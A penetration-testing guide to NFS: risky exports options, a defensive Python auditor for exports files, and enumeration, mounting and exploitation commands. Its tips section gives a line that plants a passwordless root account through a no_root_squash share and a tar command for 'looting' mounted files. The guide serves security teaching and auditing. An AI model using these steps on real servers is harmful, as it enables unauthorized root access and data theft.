NFS

NFS Security & Exploitation Guide

1. About NFS

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems. Its purpose is to allow systems to:

  • Access remote file systems over a network as if they were local.

  • Provide file sharing primarily between Linux and Unix systems (not directly compatible with SMB).

Configuration File:

  • /etc/exports defines which directories are shared and the permissions granted to clients.

Default Ports:

  • RPC portmapper: 111/TCP & UDP

  • NFS service: 2049/TCP & UDP


2. Dangerous NFS Export Settings

Some NFS configurations can be insecure and lead to privilege escalation or unauthorized access:

  • rw → Grants read & write permissions.

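  • insecure → Accepts client requests from source ports >1024, which any unprivileged user on the client can open (less trusted).

  • nohide → Stops a nested (child) filesystem from being hidden: clients that mount the parent export can see into it without mounting it separately.

  • no_root_squash → Critical risk: root users on clients retain root privileges on the NFS share (can create files owned by UID/GID 0).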

Best Practice: Always avoid no_root_squash in production environments.
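
A defensive check for the options listed above, as an added example that is not part of the original guide: a small Python auditor that parses exports(5) text and reports each dangerous option per export and client. The function name audit_exports and the sample exports content are assumptions constructed for illustration.

```python
import re

# Options section 2 of this page calls out, and why each one matters.
RISKY = {
    "rw": "clients may write to the export",
    "insecure": "requests accepted from unprivileged source ports",
    "nohide": "filesystems mounted beneath the export are exposed",
    "no_root_squash": "client root keeps UID/GID 0 on the share",
}
CANCELS = {"ro": "rw", "secure": "insecure", "hide": "nohide",
           "root_squash": "no_root_squash"}     # safe counterparts, last one wins
ENTRY = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")  # host(opts), host or (opts)

def audit_exports(text):
    """Yield (path, client, option, reason) findings for exports(5) text."""
    text = text.replace("\\\n", " ")            # join backslash-continued lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments
        if not line:
            continue
        path, *fields = line.split()
        defaults = []
        for field in fields:
            if field.startswith("-"):           # "-opt,opt": defaults for later clients
                defaults = field[1:].split(",")
                continue
            m = ENTRY.match(field)
            if not m:
                continue
            client = m.group(1) or "*"          # bare "(opts)" applies to every host
            active = set()
            for opt in defaults + (m.group(2) or "").split(","):
                if opt in RISKY:
                    active.add(opt)
                active.discard(CANCELS.get(opt))
            if client == "*":
                yield (path, client, "world", "exported to any host")
            yield from ((path, client, o, RISKY[o]) for o in sorted(active))

# Constructed sample input, not taken from a real server.
SAMPLE = """\
/srv/nfs_share  *(rw,no_root_squash)
/srv/backup     10.0.0.5(ro,root_squash)
/srv/build      -rw,insecure 10.0.0.6 10.0.0.7(ro)
/srv/home       10.0.0.8 (rw)   # stray space: rw applies to every host
"""

if __name__ == "__main__":
    print(*audit_exports(SAMPLE), sep="\n")
```

Run it against the server's own /etc/exports by passing the file contents to audit_exports; paths containing quoted spaces or octal escapes are not handled.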


3. Enumeration & Exploitation

Nmap Enumeration

Use Nmap NSE scripts to fingerprint NFS:

sudo nmap -sV -p111,2049 --script "nfs*" 192.0.2.15

Show Available NFS Shares

showmount -e 192.0.2.15

Example output:

Export list for 192.0.2.15:
/srv/nfs_share *

4. Mounting & Unmounting NFS Shares

Mount a Share

mkdir target-NFS
sudo mount -t nfs 192.0.2.15:/srv/nfs_share ./target-NFS/ -o nolock

Unmount a Share

sudo umount ./target-NFS

5. Tips & Tricks for Pentesters

  • Privilege Escalation via no_root_squash: If enabled, create a file owned by root on your local system, then copy it to the mounted share:

    echo "hacked::0:0::/root:/bin/bash" > ./target-NFS/passwd

    This could allow creation of root accounts if /etc/passwd is exported.

  • Recursive Share Search: Check for nested exports using findmnt or by mounting multiple shares.

  • Quick Looting with tar: Instead of downloading files individually:

    cd ./target-NFS
    tar -cvf loot.tar *
